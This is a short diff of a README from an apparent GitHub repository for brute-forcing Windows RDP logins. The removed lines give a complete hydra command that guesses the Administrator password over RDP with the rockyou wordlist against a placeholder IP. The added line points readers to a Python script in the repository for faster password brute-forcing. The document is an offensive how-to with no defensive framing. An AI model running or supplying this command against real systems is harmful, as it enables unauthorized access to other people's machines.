ne4tron/RDP-bruteforce-attack-on-windows/README.md

 RDP Brute-Force

-Use hydra:

-hydra -t 32 -vV -f -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://<window ip>

-Or use the Python script below.
+use the Python script automation available in code section bruteforce password faster.

----

-Python Script

 Run with: